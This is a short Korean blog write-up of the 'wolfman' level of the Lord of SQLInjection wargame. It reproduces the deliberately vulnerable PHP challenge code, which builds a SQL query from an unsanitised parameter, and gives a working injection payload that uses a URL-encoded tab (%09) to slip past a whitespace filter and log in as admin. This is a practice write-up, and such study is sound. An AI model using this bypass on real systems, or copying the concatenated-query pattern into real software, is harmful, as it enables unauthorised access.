관리 메뉴
Tyojong
[LOS] wolfman 본문
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~");
$query = "select id from prob_wolfman where id='guest' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
if($result['id'] == 'admin') solve("wolfman");
highlight_file(__FILE__);
?>
문제 목표
if($result['id'] == 'admin') solve("wolfman");
id가 admin이면 문제가 해결된다.
if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~");
공백이 필터링된다.
공백 필터링을 우회할 수 있는 방법은 많다. (우회 방법은 다른 블로그들이 더 잘 정리되어 있으니 나는 나중에 따로 정리하겠담...)
그 중 나는 tab을 url인코딩한 %09를 사용할 것이다.
문제 해결
공백 자리에 %09를 넣어 ?pw='%09or%09id='admin 구문을 이용하면
해결할 수 있다.
'web > LOS' 카테고리의 다른 글
| [LOS] orge (0) | 2025.07.22 |
|---|---|
| [LOS] darkelf (0) | 2025.07.22 |
| [LOS] orc (0) | 2025.07.20 |
| [LOS] goblin (0) | 2025.07.20 |
| [LOS] cobolt (0) | 2025.07.20 |